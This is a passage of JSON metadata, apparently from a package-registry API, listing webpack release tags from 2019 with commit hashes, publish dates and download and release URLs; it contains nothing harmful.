5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dep